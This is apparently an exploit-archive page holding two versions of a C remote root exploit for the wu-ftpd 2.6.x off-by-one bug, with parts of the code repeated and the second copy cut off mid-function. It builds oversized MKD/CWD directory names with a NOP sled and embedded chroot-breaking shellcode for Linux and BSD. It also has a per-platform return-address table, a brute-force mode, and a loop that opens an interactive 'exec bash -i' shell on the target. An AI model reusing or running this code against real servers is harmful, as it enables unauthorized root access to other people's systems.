int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];

memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);

for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
{
dir_nm[dr_n]=(gb_character);
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);

if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD command failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);

send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD command failed.\n\n");
exit(FAD);
}
return;
}

int send_shellcode(int sock,int type,char *dir_nm)
{
int dr_n=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];

memset((char *)dir_nm,(NRL),(GET_R));
/* MKD command */
dir_nm[cmd_f++]=(0x4d);
dir_nm[cmd_f++]=(0x4b);
dir_nm[cmd_f++]=(0x44);
dir_nm[cmd_f++]=(0x20);

for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(shellcode_ffx2);dr_n++)
{
dir_nm[dr_n]=(DEF_NOP);
}
for(cmd_f=(NRL);cmd_f<strlen(shellcode_ffx2);cmd_f++)
{
dir_nm[dr_n++]=shellcode_ffx2[cmd_f];
}
dir_nm[dr_n++]=(0x0d);
dir_nm[dr_n++]=(0x0a);

if(type)
{
send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
exit(FAD);
}
}
/* CMD command */
cmd_f=(NRL);
dir_nm[cmd_f++]=(0x43);
dir_nm[cmd_f++]=(0x57);
dir_nm[cmd_f++]=(0x44);

send(sock,dir_nm,strlen(dir_nm),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,(GET_R)-1,(NRL));

if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
exit(FAD);
}
return;
}

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
char atk_bf[(GET_R)];
{
fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41)); /* 01 */
fprintf(stdout," [+] 02: make shell-code directory.\n");
(int)send_shellcode(sock,d_type,(atk_bf)); /* 02 */
fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43)); /* 03 */
fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44)); /* 04 */
fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45)); /* 05 */
fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46)); /* 06 */
fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47)); /* 07 */
fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48)); /* 08 */
fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49)); /* 09 */
fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50)); /* 10 */
fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51)); /* 11 */
fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52)); /* 12 */
fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53)); /* 13 */
fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54)); /* 14 */
fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55)); /* 15 */
(int)make_retloc(sock,type,(atk_bf),sh_addr); /* 16 */
}
return;
}

int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
char get_nm[(GET_R)];

memset((char *)atk_bf,(NRL),(GET_R));
if(type) /* MKD command */
{
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x4b);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
else /* RMD command */
{
atk_bf[cmd_f++]=(0x52);
atk_bf[cmd_f++]=(0x4d);
atk_bf[cmd_f++]=(0x44);
atk_bf[cmd_f++]=(0x20);
}
for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(DEF_ANSH);r_rn_2++)
atk_bf[r_rn_1++]=(0x41);
{
*(long *)&atk_bf[r_rn_1]=(sh_addr);
r_rn_1+=(DEF_ALIGN);
*(long *)&atk_bf[r_rn_1]=(sh_addr);
r_rn_1+=(DEF_ALIGN);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x41);
atk_bf[r_rn_1++]=(0x0d);
atk_bf[r_rn_1++]=(0x0a);
}
send(sock,atk_bf,strlen(atk_bf),(NRL));
(u_int)sleep(SCS);
memset((char *)get_nm,(NRL),sizeof(get_nm));
recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

if(type) /* MKD command */
{
if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
{
fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
}
else /* RMD command */
{
if(!strstr(get_nm,(CWD_COMM_SCS)))
{
fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
exit(FAD);
}
else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
}
return;
}

int main(int argc,char *argv[])
{
int opt_g,sock,__bf=(NRL);
int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
char user_id[(DEF_VA)]=(DEF_STR);
char pass_wd[(DEF_VA)]=(DEF_STR);
char tg_host[(DEF_VA)]=(DEF_HOST);
int tg_port=(DEF_PORT);
u_long sh_addr=(plat[t_g].sh_addr);

(void)banrl();
while((opt_g=getopt(argc,argv,"M:m:H:h:U:u:P:p:N:n:S:s:T:t:BbIi"))!=EOF)
{
extern char *optarg;
switch(opt_g)
{
case 'M':
case 'm':
mx_bf=(atoi(optarg));
bf_lsz=((0x1000)/mx_bf);
break;

case 'H':
case 'h':
memset((char *)tg_host,(NRL),sizeof(tg_host));
strncpy(tg_host,optarg,sizeof(tg_host)-1);
break;

case 'U':
case 'u':
memset((char *)user_id,(NRL),sizeof(user_id));
strncpy(user_id,optarg,sizeof(user_id)-1);
break;

case 'P':
case 'p':
memset((char *)pass_wd,(NRL),sizeof(pass_wd));
strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
break;

case 'N':
case 'n':
tg_port=(atoi(optarg));
break;

case 'S':
case 's':
sh_addr=strtoul(optarg,(NRL),(NRL));
break;

case 'T':
case 't':
if((t_g=(atoi(optarg)))<(3))
sh_addr=(plat[t_g].sh_addr);
else (void)prcode_usage(argv[(NRL)]);
break;

case 'B':
case 'b':
__bf=(SCS);
break;

case 'I':
case 'i':
(void)prcode_usage(argv[(NRL)]);
break;

case '?':
(void)prcode_usage(argv[(NRL)]);
break;
}
}
if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
(void)prcode_usage(argv[(NRL)]);

memset((char *)home_dir,(NRL),sizeof(home_dir));
snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(HOME_DIR),user_id);

if(!__bf)
{
fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
fprintf(stdout," [+] address: %p.\n",sh_addr);
fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);

sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");

fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);

fprintf(stdout," [2] send exploit code.\n");
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
close(sock);

fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);

sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");

fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);

fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".\n");
(void)conn_shell(sock);
close(sock);
}
else
{
int bt_num=(NRL);
t_g=(4);
sh_addr=(plat[t_g].sh_addr);
fprintf(stdout," [*] Brute-Force mode.\n");
fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);

for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
{
sh_addr=(u_long)null_chk(sh_addr);
fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);

sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");

fprintf(stdout," [1] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);

fprintf(stdout," [2] send exploit code.\n");
if(bt_num==(NRL))
{
(void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
}
else
{
(void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
}
close(sock);

fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
fflush(stdout);

sock=(int)setsock(tg_host,tg_port);
(void)re_connt(sock);
fprintf(stdout," [ OK ]\n");

fprintf(stdout," [3] ftpd connection login.\n");
(void)ftpd_login(sock,user_id,pass_wd);

fprintf(stdout," [4] send exploit code.\n");
(void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

fprintf(stdout," [5] Waiting, execute the shell ");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".");
fflush(stdout);
(u_int)sleep(SCS);

fprintf(stdout,".\n");
(void)conn_shell(sock);
close(sock);

sh_addr+=(bf_lsz);
}
}
exit(NRL);
}

int setsock(char *u_host,int u_port)
{
int sock;
struct hostent *sxp;
struct sockaddr_in sxp_addr;

if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
{
return(FAD);
}
if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
{
return(FAD);
}
sxp_addr.sin_family=AF_INET;
sxp_addr.sin_port=htons(u_port);
sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));

if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
{
return(FAD);
}
return(sock);
}

void conn_shell(int conn_sock)
{
int died;
int ex_t=(NRL);
char *command=(DEF_COMM);
char readbuf[(GET_R)];
fd_set rset;

memset((char *)readbuf,(NRL),sizeof(readbuf));
fprintf(stdout," [*] Send, command packet !\n\n");
send(conn_sock,command,strlen(command),(NRL));

for(;;)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(conn_sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(conn_sock+1,&rset,NULL,NULL,NULL);

if(FD_ISSET(conn_sock,&rset))
{
died=read(conn_sock,readbuf,sizeof(readbuf)-1);
if(died<=(NRL))
{
if(!ex_t)
return;
else
exit(NRL);
}
readbuf[died]=(NRL);
fprintf(stdout,"%s",readbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
if(died>(NRL))
{
readbuf[died]=(NRL);
if(strstr(readbuf,"exit"))
ex_t=(SCS);
write(conn_sock,readbuf,died);
}
}
}
return;
}

void re_connt(int st_sock_va)
{
if(st_sock_va==(FAD))
{
fprintf(stdout," [ Fail ]\n\n");
exit(FAD);
}
}

void banrl()
{
fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}

/* eoc */

// milw0rm.com [2003-08-03]
		

- 漏洞信息 (78)

wu-ftpd 2.6.2 Remote Root Exploit (advanced version) (EDBID:78)
linux remote
2003-08-11 Verified
21 Xpl017Elz
N/A [点击下载]
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
**
** Update: 
**         [v0.0.2] August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
**         [v0.0.3] August 3, Brute-Force function addition.
**         [v0.0.4] August 4, Added FreeBSD, OpenBSD version wu-ftpd-2.6.x exploit.
**                                    It will be applied well to most XxxxBSD.
**         [v0.0.5] August 4, Remote scan & exploit test function addition.
**                     August 6, Cleaning.
**
*/

#define VERSION "v0.0.5"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD 55
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR_LINUX "/home/"
#define HOME_DIR_FRBSD "/usr/home/"
#define HOME_DIR_OPBSD "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
#define DEF_COMM_OB "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec sh -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
#define CMD_ERROR "500"

void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock,u_long scs_addr);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
int bscann(char *chk_ban);
int check_exp(int sock);

struct os
{
	int num;
	char *v_nm;
	u_long sh_addr;
	u_long bf_addr;
	char *shellcode;
	int off_st;
	char *home;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
int __exp_test=(NRL); /* check exploit test */
int b_scan=(NRL); /* banner check */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char lnx_shellcode_ffx2[]=
	/* setuid/chroot-break/execve shellcode by Lam3rZ */
	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
	"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
	"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
	"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
	"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
	"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
	"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
	"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
	"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
	"\x2e\x2e\x31\x31";

char bsd_shellcode_ffx2[]=
	/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
	"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
	"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
	"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0\x88"
	"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
	"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
	"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
	"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
	"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
	"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
	"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
	"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30"
	"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
	"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
	"\x63\x6f\x6d";

struct os plat[]=
{
	/*
	** I enjoy version up, will not share more. :-}
	*/
	{
		0,"RedHat Linux 6.x Version wu-2.6.0 compile",0x0806a59c,
		0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
		1,"RedHat Linux 6.x Version wu-2.6.1 compile",0x0806aad8,
		0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
		2,"RedHat Linux 6.x Version wu-2.6.2 compile",0x0806aa60,
		0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
		3,"FreeBSD 4.6.2-RELEASE Version wu-2.6.0 compile",0x0806b826,
		0x0806b026,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
		4,"FreeBSD 4.6.2-RELEASE Version wu-2.6.1 compile",0x0806cb36,
		0x0806c036,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
		5,"FreeBSD 4.6.2-RELEASE Version wu-2.6.2 compile",0x0806ccaa,
		0x0806c082,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
		6,"OpenBSD 3.0 Version wu-2.6.0 compile",0xdfbfc8f8,
		0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
		7,"OpenBSD 3.0 Version wu-2.6.1 compile",0xdfbfc8f8,
		0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
		8,"OpenBSD 3.0 Version wu-2.6.2 compile",0xdfbfc8f8,
		0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
		0x82,NULL,0x0,0x0,NULL,0,NULL
	}
};

void prcode_usage(char *f_nm)
{
	int r_n=(NRL);
	fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
	fprintf(stdout," \t-h [hostname]   : Target hostname & ip.\n");
	fprintf(stdout," \t-u [userid]     : User id.\n");
	fprintf(stdout," \t-p [passwd]     : User password.\n");
	fprintf(stdout," \t-n [port num]   : Target port number.\n");
	fprintf(stdout," \t-s [shelladdr]  : Shellcode address.\n");
	fprintf(stdout," \t-m [max num]    : Brute-Force Count number.\n");
	fprintf(stdout," \t-i              : help information.\n");
	fprintf(stdout," \t-q              : banner scan mode.\n");
	fprintf(stdout," \t-c              : check exploit test.\n");
	fprintf(stdout," \t-t [target num] : Select target number.\n");
	fprintf(stdout," \t-b [target num] : Brute-Force mode. (Select target number)\n\n");
	for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
	{
		fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
	}
	fprintf(stdout,"\n Example1: %s -hlocalhost -ux82 -px82 -n21 -t0",f_nm);
	fprintf(stdout,"\n Example2: %s -hwu_sub -ux82 -px82 -n21 -b0",f_nm);
	fprintf(stdout,"\n Example3: %s -h0 -ux82 -px82 -qc -t0\n\n",f_nm);
	exit(FAD);
}

u_long null_chk(u_long sh_addr)
{
	int chk_0x2f=(NRL);
	for(chk_0x2f=(NRL);chk_0x2f<0x20;chk_0x2f+=(DEF_ALIGN*2))
	{
		if((sh_addr>>(chk_0x2f)&0xff)==(0x2f))
		{
			fprintf(stderr," [-] slash was included to &shellcode address.\n\n");
			exit(FAD);
		}
	}
	if((sh_addr>>(NRL)&0xff)==(0x00))
	{
		return(sh_addr+=(SCS));
	}
	else return(sh_addr);
}

int bscann(char *chk_ban)
{
	fprintf(stdout,"\n [+] Checking, banner ...\n");
	if(strstr(chk_ban,"wu-2.6.0"))
	{
		fprintf(stdout," [*] [wu-ftpd-2.6.0]: This is version that exploit is possible.\n\n");
		return(SCS);
	}
	else if(strstr(chk_ban,"wu-2.6.1"))
	{
		fprintf(stdout," [*] [wu-ftpd-2.6.1]: This is version that exploit is possible.\n\n");
		return(SCS);
	}
	else if(strstr(chk_ban,"wu-2.6.2"))
	{
		fprintf(stdout," [*] [wu-ftpd-2.6.2]: This is version that exploit is possible.\n\n");
		return(SCS);
	}
	else
	{
		fprintf(stdout," [x] This version does not support exploit.\n");
		return(FAD);
	}
}

void ftpd_login(int sock,char *user,char *pass)
{
	char send_recv[(GET_R)];

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(b_scan)
	{
		b_scan=(NRL);
		if(((int)bscann(send_recv))==(FAD))
		{
			fprintf(stdout," [-] exploit stop.\n\n");
			exit(FAD);
		}
	}
	if(!strstr(send_recv,(FTP_CONN_SCS)))
	{
		fprintf(stdout," [-] ftpd connection failure.\n\n");
		close(sock);
		exit(FAD);
	}
	else fprintf(stdout," [*] ftpd connection success.\n");
	fprintf(stdout," [+] User id input.\n");

	memset((char *)send_recv,(NRL),sizeof(send_recv));
	snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
	send(sock,send_recv,strlen(send_recv),(NRL));

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(!strstr(send_recv,(FTP_USER_FAD)))
	{
		fprintf(stdout," [-] User id input failure.\n\n");
		close(sock);
		exit(FAD);
	}
	else fprintf(stdout," [+] User password input.\n");

	memset((char *)send_recv,(NRL),sizeof(send_recv));
	snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
	send(sock,send_recv,strlen(send_recv),(NRL));

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(strstr(send_recv,(FTP_LOGIN_FAD)))
	{
		fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
		close(sock);
		exit(FAD);
	}
	else if(strstr(send_recv,(FTP_LOGIN_SCS)))
	{
		fprintf(stdout," [*] User %s logged in.\n",user);
	}
	else
	{
		fprintf(stdout," [-] ftpd handshake failure.\n\n");
		close(sock);
		exit(FAD);
	}
	return;
}

int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
	int dr_n=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)dir_nm,(NRL),(GET_R));
	/* MKD command */
	dir_nm[cmd_f++]=(0x4d);
	dir_nm[cmd_f++]=(0x4b);
	dir_nm[cmd_f++]=(0x44);
	dir_nm[cmd_f++]=(0x20);

	for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
	{
		dir_nm[dr_n]=(gb_character);
	}
	dir_nm[dr_n++]=(0x0d);
	dir_nm[dr_n++]=(0x0a);

	if(type)
	{
		send(sock,dir_nm,strlen(dir_nm),(NRL));
		(u_int)sleep(SCS);
		memset((char *)get_nm,(NRL),sizeof(get_nm));
		recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD command failed.\n\n");
			exit(FAD);
		}
	}
	/* CMD command */
	cmd_f=(NRL);
	dir_nm[cmd_f++]=(0x43);
	dir_nm[cmd_f++]=(0x57);
	dir_nm[cmd_f++]=(0x44);

	send(sock,dir_nm,strlen(dir_nm),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(!strstr(get_nm,(CWD_COMM_SCS)))
	{
		fprintf(stdout," [-] CWD command failed.\n\n");
		exit(FAD);
	}
	return;
}

int send_shellcode(int sock,int type,char *dir_nm)
{
	int dr_n=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)dir_nm,(NRL),(GET_R));
	/* MKD command */
	dir_nm[cmd_f++]=(0x4d);
	dir_nm[cmd_f++]=(0x4b);
	dir_nm[cmd_f++]=(0x44);
	dir_nm[cmd_f++]=(0x20);
	
	for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(plat[t_g].shellcode);dr_n++)
	{
		dir_nm[dr_n]=(DEF_NOP);
	}
	for(cmd_f=(NRL);cmd_f<strlen(plat[t_g].shellcode);cmd_f++)
	{
		dir_nm[dr_n++]=plat[t_g].shellcode[cmd_f];
	}
	dir_nm[dr_n++]=(0x0d);
	dir_nm[dr_n++]=(0x0a);

	if(type)
	{
		send(sock,dir_nm,strlen(dir_nm),(NRL));
		(u_int)sleep(SCS);
		memset((char *)get_nm,(NRL),sizeof(get_nm));
		recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
			exit(FAD);
		}
	}
	/* CMD command */
	cmd_f=(NRL);
	dir_nm[cmd_f++]=(0x43);
	dir_nm[cmd_f++]=(0x57);
	dir_nm[cmd_f++]=(0x44);

	send(sock,dir_nm,strlen(dir_nm),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,(GET_R)-1,(NRL));

	if(!strstr(get_nm,(CWD_COMM_SCS)))
	{
		fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
		exit(FAD);
	}
	return;
}

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
	char atk_bf[(GET_R)];
	switch(t_g)
	{
		case 0:
		case 1:
		case 2:
			fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));	/* 01 */
			fprintf(stdout," [+] 02: make shell-code directory.\n");
			(int)send_shellcode(sock,d_type,(atk_bf));	/* 02 */
			fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
